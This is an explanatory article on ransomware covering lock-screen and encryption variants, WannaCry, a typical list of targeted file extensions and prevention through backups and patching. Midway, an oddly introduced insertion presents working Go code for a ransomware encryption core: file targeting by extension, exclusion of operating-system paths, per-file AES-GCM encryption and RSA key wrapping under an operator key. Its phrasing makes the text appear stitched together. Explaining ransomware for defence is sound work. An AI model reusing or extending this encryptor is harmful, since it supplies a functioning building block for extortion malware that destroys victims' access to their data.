What is Ransomware?

Ransomware is malicious software that restricts or prevents access to data and systems and demands payment of a "ransom" in exchange for restoring that access. A ransomware attack is therefore a form of digital extortion.
The ransomware threat has grown markedly over the last couple of years; new incidents are made public almost weekly. Faced with the possible loss of their data, many companies pay the ransom in an attempt to recover their encrypted files. Attackers have refined the malware and use botnets and spam campaigns to distribute it at scale.
Ransomware has been in widespread use for cyber-attacks since around 2010, and earlier variants existed before that. Simple variants display a lock screen and prevent use of the system; the banner typically claims that the system is part of an active criminal investigation and is blocked until a fine is paid.


To raise the pressure on victims, newer variants encrypt data so that decryption is impossible without the corresponding key. Besides data stored locally on the victim's system, ransomware can encrypt data on mapped network drives and even in cloud storage that is synchronised to the machine.
From the criminals' point of view, ransomware has the advantage of hard-to-trace payment in Bitcoin or prepaid payment cards. For the victim, the difference from more traditional threats such as banking trojans, DDoS tools or phishing is that the damage is immediate: no bank will block or reimburse the transaction, and removing the malware with an antivirus tool does not bring the files back. Pictures, documents and other files remain encrypted and, without a backup or the key, are usually lost. Preventive measures such as regular backups kept out of the malware's reach and timely patching remain the most effective mitigation.
Most ransomware is, in effect, a denial-of-service attack on the infected user or organisation: by denying access to a machine or its data, the attacker impacts the availability of systems. This differs subtly from the many attacks that steal or alter information held in an organisation's systems. Many organisations have built cyber security assurance programmes around the confidentiality and integrity of systems; far fewer have historically focused on availability, and in particular on the availability of end-user or client systems.

Common Types of Ransomware

There are many variants of ransomware, but the most common types are lock screen ransomware and encryption ransomware. The WannaCry variant that hit in May 2017 was encryption ransomware coupled to a worm component, which spread across network infrastructure on its own by exploiting the SMBv1 vulnerability addressed by Microsoft's MS17-010 update (the EternalBlue exploit).

What is Lock Screen Ransomware?

Ransomware that blocks access to a system anchors itself in the infected system so that it loads after every boot. The desktop is covered by an image or web page that informs the user about the infection and demands payment. Alleged proceedings for copyright violations or the use of pornographic content are the usual pretexts. To make the demand appear genuine, names and logos of well-known organisations are used, sometimes alongside pornographic content or a picture taken with the webcam connected to the infected system. The screen is localised to the country suggested by the geolocation of the victim's IP address.

Figure 1 - Lock Screen Ransomware

The malicious programs use various methods to achieve persistence. The only interaction the lock screen permits is entering the unlock code received after paying the ransom; all other input and keyboard combinations are intercepted and ignored. In addition, the malware continuously checks for, and blocks, the start of processes that could be used to bypass it, such as Task Manager, the Registry Editor or the command prompt.

Since this form of ransomware only restricts use of the operating system and does not touch the data, the system can usually be restored without data loss by booting from a USB stick or another recovery medium and removing the persistence mechanism.

The Browlock family works in a similar way. The operating system is not actually infected; a lock screen is displayed in the browser's full-screen mode and JavaScript blocks every attempt to close it.

What is Encryption Ransomware?

Ransomware that encrypts data is far more complex than lock screen ransomware. Depending on the family, symmetric or asymmetric methods (or a combination of both) are used to encrypt the data. If the cryptography is correctly implemented, decryption is only possible with the corresponding key. In contrast to lock screen ransomware, the operating system itself remains usable.

The encryption usually happens in several stages:

  • Encryption of the files with a symmetric method such as AES, typically using a freshly generated key per file or per victim
  • Encryption of those symmetric keys with an asymmetric method such as RSA or elliptic-curve cryptography (ECC), using a public key embedded in the sample or retrieved from the attacker; the matching private key never leaves the attacker, which is why a forensic copy of the infected system cannot simply be decrypted offline

Before encrypting, the ransomware searches local drives, including hard disks and USB sticks, and network drives for user data such as documents, photos, videos and other file types likely to be of value to the victim. Many ransomware variants carry a list of the file types to be encrypted; the one below is typical:

.123 .3dm .3ds .3g2 .3gp .602 .7z .aes .arc .asc .asf .asm .asp .avi .bak .bat .bmp .brd .cgm .class .cmd .cpp .crt .cs .csr .csv .db .dbf .dch .dif .dip .djv .djvu .doc .docb .docm .docx .dot .dotm .dotx .fla .flv .frm .gif .gpg .gz .hwp .ibd .jar .java .jpeg .jpg .js .key .lay .lay6 .ldf .m3u .m4u .max .mdb .mdf .mid .mkv .mml .mov .mp3 .mp4 .mpeg .mpg .ms11 .myd .myi .nef .odb .odg .odp .ods .odt .otg .otp .ots .ott .p12 .paq .pas .pdf .pem .php .pl .png .pot .potm .potx .ppam .pps .ppsm .ppsx .ppt .pptm .pptx .psd .qcow2 .rar .raw .rb .rtf .sch .sh .sldm .sldx .slk .sql .sqlite3 .stc .std .sti .stw .svg .swf .sxc .sxd .sxi .sxm .sxw .tar .tar.bz2 .tbk .tgz .tif .tiff .txt .uop .uot .vb .vbs .vdi .vmdk .vmx .vob .wav .wb2 .wk1 .wks .wma .wmv .xlc .xlm .xls .xlsb .xlsm .xlsx .xlt .xltm .xltx .xlw .xml .zip

In addition, certain files and folders are excluded from encryption, such as those the operating system needs in order to run. Each original file is replaced by its encrypted counterpart and the plaintext is deleted; many families also delete Volume Shadow Copies so that earlier versions cannot be restored from them. The user is then informed about the encryption by ransom notes stored as text files or images or set as the desktop background.
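The two-stage scheme above and the file selection and replacement it is applied to, as an added example in Go that is not code from this page or from any ransomware family: it models the victim's drives as an in-memory map of constructed paths, selects files by a small assumed subset of the extension list, skips assumed operating-system paths, encrypts each selected file with a fresh AES-256-GCM key, wraps that key with RSA-OAEP under the operator's public key, and then shows that the data comes back only with the operator's private key. The names isTarget, encryptFile, decryptFile, encryptTargets and the sample paths are this example's own. Nothing is written to disk.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"path"
	"strings"
)

// targetExt is a small assumed subset of the extension list quoted above.
var targetExt = map[string]bool{".docx": true, ".xlsx": true, ".jpg": true, ".pdf": true, ".vmdk": true}

// isTarget reports whether a file path would be selected for encryption.
func isTarget(p string) bool {
	lower := strings.ReplaceAll(strings.ToLower(p), `\`, "/") // path.Ext expects "/" separators
	if strings.HasPrefix(lower, "c:/windows/") || strings.HasPrefix(lower, "c:/program files/") {
		return false // operating-system paths are skipped so the machine still boots to show the note
	}
	return targetExt[path.Ext(lower)]
}

type EncryptedFile struct{ WrappedKey, Nonce, Ciphertext []byte } // replaces each original; the plain AES key is never stored

// newKeyPair models the operator's key generation; the private half is what the ransom buys.
func newKeyPair() (*rsa.PrivateKey, error) { return rsa.GenerateKey(rand.Reader, 2048) }

// newGCM builds the AES-256-GCM AEAD for a raw 32-byte key.
func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// encryptFile runs the two stages: AES-GCM on the data with a fresh random key, then RSA-OAEP on that key.
func encryptFile(pub *rsa.PublicKey, data []byte) (EncryptedFile, error) {
	buf := make([]byte, 32+12) // per-file key followed by a 96-bit GCM nonce
	if _, err := rand.Read(buf); err != nil {
		return EncryptedFile{}, err
	}
	key, nonce := buf[:32], buf[32:]
	gcm, err := newGCM(key)
	if err != nil {
		return EncryptedFile{}, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	if err != nil {
		return EncryptedFile{}, err
	}
	return EncryptedFile{WrappedKey: wrapped, Nonce: nonce, Ciphertext: gcm.Seal(nil, nonce, data, nil)}, nil
}

// decryptFile is the recovery path that only the private-key holder has.
func decryptFile(priv *rsa.PrivateKey, ef EncryptedFile) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, ef.WrappedKey, nil)
	if err != nil {
		return nil, err // a wrong private key fails here, at the OAEP unwrap
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, ef.Nonce, ef.Ciphertext, nil) // GCM also rejects tampered ciphertext
}

var sampleFiles = map[string][]byte{ // constructed in-memory stand-in for a victim's drives
	`C:\Users\alice\Documents\report.docx`: []byte("quarterly figures"),
	`C:\Users\alice\Pictures\holiday.jpg`:  []byte("jpeg bytes"),
	`C:\Windows\System32\kernel32.dll`:     []byte("system code"),
}

// encryptTargets encrypts every selected file and returns only those entries (originals replaced, excluded files untouched).
func encryptTargets(pub *rsa.PublicKey, files map[string][]byte) (map[string]EncryptedFile, error) {
	out := make(map[string]EncryptedFile)
	for name, data := range files {
		if !isTarget(name) {
			continue
		}
		ef, err := encryptFile(pub, data)
		if err != nil {
			return nil, err
		}
		out[name] = ef
	}
	return out, nil
}

func main() {
	priv, _ := newKeyPair()
	other, _ := newKeyPair()
	enc, _ := encryptTargets(&priv.PublicKey, sampleFiles)
	doc := enc[`C:\Users\alice\Documents\report.docx`]
	pt, err := decryptFile(priv, doc)
	_, wrongErr := decryptFile(other, doc)
	fmt.Printf("%d of %d encrypted; operator key: %q (%v); other key: %v\n", len(enc), len(sampleFiles), pt, err, wrongErr)
}
```

The practitioner's takeaway sits in decryptFile: the only material needed for recovery is the RSA private key, which never exists on the victim's machine, so a forensic image of the infected system does not help unless the family mishandled its keys (for example, left the per-file key or RSA key material in memory or used a predictable random source). GCM's authentication tag also means a truncated or corrupted ciphertext is rejected outright rather than decrypting to garbage. This is why backups kept out of the malware's reach, not decryption tools, are the recovery plan.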

Figure 2 - WanaCrypt0r Lock Screen

Ransomware Incidents

Ransomware incidents are usually the visible result of failures in prevention. Unpatched systems, old or non-existent backups, weak administrator passwords and missing network segmentation are just some of the conditions that allow ransomware to be installed and to spread.

Employees also play a key role in most ransomware incidents. Some attacks are sophisticated enough to be very difficult to detect, but many ransomware spam e-mails are crude, and security awareness training helps employees recognise and report them, which reduces the risk.

In many cases, indicators of trojans or DDoS attacks are partially ignored and not actively investigated by companies, and misconfigurations are neglected because they have no visible effect on operations. The damage in those cases is often relatively low. Damage from ransomware, however, can be severe, and active prevention measures need to be in place.
